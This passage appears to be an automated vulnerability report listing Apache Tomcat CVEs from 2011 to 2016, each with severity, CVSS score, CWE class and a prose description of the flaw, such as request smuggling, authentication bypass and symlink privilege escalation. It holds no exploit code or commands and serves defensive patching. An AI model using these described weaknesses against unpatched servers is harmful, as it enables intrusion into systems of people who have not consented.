The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.

Vulnerable Software & Versions: (show all)

CVE-2011-1419  

Severity:Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)

Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.

Vulnerable Software & Versions: (show all)

CVE-2011-1475  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-20 Improper Input Validation

The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."

Vulnerable Software & Versions: (show all)

CVE-2011-2204  

Severity:Low
CVSS Score: 1.9 (AV:L/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.

Vulnerable Software & Versions: (show all)

CVE-2011-2481  

Severity:Medium
CVSS Score: 4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)

Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.  NOTE: this vulnerability exists because of a CVE-2009-0783 regression.

Vulnerable Software & Versions: (show all)

CVE-2011-2526  

Severity:Medium
CVSS Score: 4.4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.

Vulnerable Software & Versions: (show all)

CVE-2011-2729  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.

Vulnerable Software & Versions: (show all)

CVE-2011-3190  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.

Vulnerable Software & Versions: (show all)

CVE-2011-3375  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.

Vulnerable Software & Versions: (show all)

CVE-2011-3376  

Severity:Medium
CVSS Score: 4.4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.

Vulnerable Software & Versions: (show all)

CVE-2011-4858  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.

Vulnerable Software & Versions: (show all)

CVE-2011-5062  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.

Vulnerable Software & Versions: (show all)

CVE-2011-5063  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-287 Improper Authentication

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.

Vulnerable Software & Versions: (show all)

CVE-2011-5064  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.

Vulnerable Software & Versions: (show all)

CVE-2012-0022  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.

Vulnerable Software & Versions: (show all)

CVE-2012-2733  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.

Vulnerable Software & Versions: (show all)

CVE-2012-3544  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.

Vulnerable Software & Versions: (show all)

CVE-2012-3546  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.

Vulnerable Software & Versions: (show all)

CVE-2012-4431  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.

Vulnerable Software & Versions: (show all)

CVE-2012-4534  

Severity:Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.

Vulnerable Software & Versions: (show all)

CVE-2012-5568  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-16 Configuration

Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.

Vulnerable Software & Versions: (show all)

CVE-2012-5885  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.

Vulnerable Software & Versions: (show all)

CVE-2012-5886  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-287 Improper Authentication

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.

Vulnerable Software & Versions: (show all)

CVE-2012-5887  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-287 Improper Authentication

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.

Vulnerable Software & Versions: (show all)

CVE-2013-0346  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

** DISPUTED ** Apache Tomcat 7.x uses world-readable permissions for the log directory and its files, which might allow local users to obtain sensitive information by reading a file.  NOTE: One Tomcat distributor has stated "The tomcat log directory does not contain any sensitive information."

Vulnerable Software & Versions: (show all)

CVE-2013-2067  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-287 Improper Authentication

java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.

Vulnerable Software & Versions: (show all)

CVE-2013-2071  

Severity:Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.

Vulnerable Software & Versions: (show all)

CVE-2013-2185  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

** DISPUTED ** The readObject method in the DiskFileItem class in Apache Tomcat and JBoss Web, as used in Red Hat JBoss Enterprise Application Platform 6.1.0 and Red Hat JBoss Portal 6.0.0, allows remote attackers to write to arbitrary files via a NULL byte in a file name in a serialized instance, a similar issue to CVE-2013-2186.  NOTE: this issue is reportedly disputed by the Apache Tomcat team, although Red Hat considers it a vulnerability. The dispute appears to regard whether it is the responsibility of applications to avoid providing untrusted data to be deserialized, or whether this class should inherently protect against this issue.

Vulnerable Software & Versions: (show all)

CVE-2013-4286  

Severity:Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)
CWE: CWE-20 Improper Input Validation

Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-RC3, when an HTTP connector or AJP connector is used, does not properly handle certain inconsistent HTTP request headers, which allows remote attackers to trigger incorrect identification of a request's length and conduct request-smuggling attacks via (1) multiple Content-Length headers or (2) a Content-Length header and a "Transfer-Encoding: chunked" header.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2005-2090.

Vulnerable Software & Versions: (show all)

CVE-2013-4322  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 processes chunked transfer coding without properly handling (1) a large total amount of chunked data or (2) whitespace characters in an HTTP header value within a trailer field, which allows remote attackers to cause a denial of service by streaming data.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-3544.

Vulnerable Software & Versions: (show all)

CVE-2013-4444  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-94 Improper Control of Generation of Code ('Code Injection')

Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0.40, in certain situations involving outdated java.io.File code and a custom JMX configuration, allows remote attackers to execute arbitrary code by uploading and accessing a JSP file.

Vulnerable Software & Versions: (show all)

CVE-2013-4590  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 allows attackers to obtain "Tomcat internals" information by leveraging the presence of an untrusted web application with a context.xml, web.xml, *.jspx, *.tagx, or *.tld XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

Vulnerable Software & Versions: (show all)

CVE-2014-0050  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.

Vulnerable Software & Versions: (show all)

CVE-2014-0075  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the parseChunkHeader function in java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 allows remote attackers to cause a denial of service (resource consumption) via a malformed chunk size in chunked transfer coding of a request during the streaming of data.

Vulnerable Software & Versions: (show all)

CVE-2014-0096  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

java/org/apache/catalina/servlets/DefaultServlet.java in the default servlet in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 does not properly restrict XSLT stylesheets, which allows remote attackers to bypass security-manager restrictions and read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

Vulnerable Software & Versions: (show all)

CVE-2014-0099  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-189 Numeric Errors

Integer overflow in java/org/apache/tomcat/util/buf/Ascii.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4, when operated behind a reverse proxy, allows remote attackers to conduct HTTP request smuggling attacks via a crafted Content-Length HTTP header.

Vulnerable Software & Versions: (show all)

CVE-2014-0119  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Apache Tomcat before 6.0.40, 7.x before 7.0.54, and 8.x before 8.0.6 does not properly constrain the class loader that accesses the XML parser used with an XSLT stylesheet, which allows remote attackers to (1) read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, or (2) read files associated with different web applications on a single Tomcat instance via a crafted web application.

Vulnerable Software & Versions: (show all)

CVE-2014-0227  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)
CWE: CWE-19 Data Processing Errors

java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat 6.x before 6.0.42, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle attempts to continue reading data after an error has occurred, which allows remote attackers to conduct HTTP request smuggling attacks or cause a denial of service (resource consumption) by streaming data with malformed chunked transfer coding.

Vulnerable Software & Versions: (show all)

CVE-2014-0230  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle cases where an HTTP response occurs before finishing the reading of an entire request body, which allows remote attackers to cause a denial of service (thread consumption) via a series of aborted upload attempts.

Vulnerable Software & Versions: (show all)

CVE-2014-7810  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

The Expression Language (EL) implementation in Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.58, and 8.x before 8.0.16 does not properly consider the possibility of an accessible interface implemented by an inaccessible class, which allows attackers to bypass a SecurityManager protection mechanism via a web application that leverages use of incorrect privileges during EL evaluation.

Vulnerable Software & Versions: (show all)

CVE-2015-5174  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.

Vulnerable Software & Versions: (show all)

CVE-2015-5345  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.

Vulnerable Software & Versions: (show all)

CVE-2015-5346  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x before 8.0.30, and 9.x before 9.0.0.M2, when different session settings are used for deployments of multiple versions of the same web application, might allow remote attackers to hijack web sessions by leveraging use of a requestedSessionSSL field for an unintended request, related to CoyoteAdapter.java and Request.java.

Vulnerable Software & Versions: (show all)

CVE-2015-5351  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)

The (1) Manager and (2) Host Manager applications in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 establish sessions and send CSRF tokens for arbitrary new requests, which allows remote attackers to bypass a CSRF protection mechanism by using a token.

Vulnerable Software & Versions: (show all)

CVE-2016-0706  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.

Vulnerable Software & Versions: (show all)

CVE-2016-0714  

Severity:Medium
CVSS Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.

Vulnerable Software & Versions: (show all)

CVE-2016-0762  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Realm implementations in Apache Tomcat versions 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder.

Vulnerable Software & Versions: (show all)

CVE-2016-0763  

Severity:Medium
CVSS Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The setGlobalContext method in org/apache/naming/factory/ResourceLinkFactory.java in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M3 does not consider whether ResourceLinkFactory.setGlobalContext callers are authorized, which allows remote authenticated users to bypass intended SecurityManager restrictions and read or write to arbitrary application data, or cause a denial of service (application disruption), via a web application that sets a crafted global context.

Vulnerable Software & Versions: (show all)

CVE-2016-1240  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

The Tomcat init script in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-java packages before 7.0.52-1ubuntu0.7 on Ubuntu 14.04 LTS, and tomcat8 and libtomcat8-java packages before 8.0.32-1ubuntu1.2 on Ubuntu 16.04 LTS allows local users with access to the tomcat account to gain root privileges via a symlink attack on the Catalina log file, as demonstrated by /var/log/tomcat7/catalina.out.

Vulnerable Software & Versions: (show all)

CVE-2016-3092  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

The MultipartStream class in Apache Commons Fileupload before 1.3.2, as used in Apache Tomcat 7.x before 7.0.70, 8.x before 8.0.36, 8.5.x before 8.5.3, and 9.x before 9.0.0.M7 and other products, allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.

Vulnerable Software & Versions: (show all)

CVE-2016-5018  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 a malicious web application was able to bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications.

Vulnerable Software & Versions: (show all)

CVE-2016-5388  

Severity:Medium
CVSS Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "A mitigation is planned for future releases of Tomcat, tracked as CVE-2016-5388"; in other words, this is not a CVE ID for a vulnerability.

Vulnerable Software & Versions: (show all)

CVE-2016-5425  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Tomcat package on Red Hat Enterprise Linux (RHEL) 7, Fedora, CentOS, Oracle Linux, and possibly other Linux distributions uses weak permissions for /usr/lib/tmpfiles.d/tomcat.conf, which allows local users to gain root privileges by leveraging membership in the tomcat group.

Vulnerable Software & Versions:

CVE-2016-6325  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Tomcat package on Red Hat Enterprise Linux (RHEL) 5 through 7, JBoss Web Server 3.0, and JBoss EWS 2 uses weak permissions for (1) /etc/sysconfig/tomcat and (2) /etc/tomcat/tomcat.conf, which allows local users to gain privileges by leveraging membership in the tomcat group.

Vulnerable Software & Versions:

CVE-2016-6794  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When a SecurityManager is configured, a web application's ability to read system properties should be controlled by the SecurityManager. In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70, 6.0.0 to 6.0.45 the system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible.

Vulnerable Software & Versions: (show all)

CVE-2016-6796  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

A malicious web application running on Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 was able to bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet.

Vulnerable Software & Versions: (show all)

CVE-2016-6797  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-284 Improper Access Control

The ResourceLinkFactory implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not limit web application access to global JNDI resources to those resources explicitly linked to the web application. Therefore, it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not.

Vulnerable Software & Versions: (show all)

CVE-2016-6816  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

The code in Apache Tomcat 9.0.0.M1 to 9.0.0.M11, 8.5.0 to 8.5.6, 8.0.0.RC1 to 8.0.38, 7.0.0 to 7.0.72, and 6.0.0 to 6.0.47 that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.

Vulnerable Software & Versions: (show all)

CVE-2016-8735  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.

Vulnerable Software & Versions: (show all)

CVE-2016-8745  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-388

A bug in the error handling of the send file code for the NIO HTTP connector in Apache Tomcat 9.0.0.M1 to 9.0.0.M13, 8.5.0 to 8.5.8, 8.0.0.RC1 to 8.0.39, 7.0.0 to 7.0.73 and 6.0.16 to 6.0.48 resulted in the current Processor object being added to the Processor cache multiple times. This in turn meant that the same Processor could be used for concurrent requests. Sharing a Processor can result in information leakage between requests including, not not limited to, session ID and the response body. The bug was first noticed in 8.5.x onwards where it appears the refactoring of the Connector code for 8.5.x onwards made it more likely that the bug was observed. Initially it was thought that the 8.5.x refactoring introduced the bug but further investigation has shown that the bug is present in all currently supported Tomcat versions.

Vulnerable Software & Versions: (show all)

CVE-2016-9774  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-59 Improper Link Resolution Before File Access ('Link Following')

The postinst script in the tomcat6 package before 6.0.45+dfsg-1~deb7u4 on Debian wheezy, before 6.0.35-1ubuntu3.9 on Ubuntu 12.04 LTS and on Ubuntu 14.04 LTS; the tomcat7 package before 7.0.28-4+deb7u8 on Debian wheezy, before 7.0.56-3+deb8u6 on Debian jessie, before 7.0.52-1ubuntu0.8 on Ubuntu 14.04 LTS, and on Ubuntu 12.04 LTS, 16.04 LTS, and 16.10; and the tomcat8 package before 8.0.14-1+deb8u5 on Debian jessie, before 8.0.32-1ubuntu1.3 on Ubuntu 16.04 LTS, before 8.0.37-1ubuntu0.1 on Ubuntu 16.10, and before 8.0.38-2ubuntu1 on Ubuntu 17.04 might allow local users with access to the tomcat account to obtain sensitive information or gain root privileges via a symlink attack on the Catalina localhost directory.

Vulnerable Software & Versions: (show all)

CVE-2016-9775  

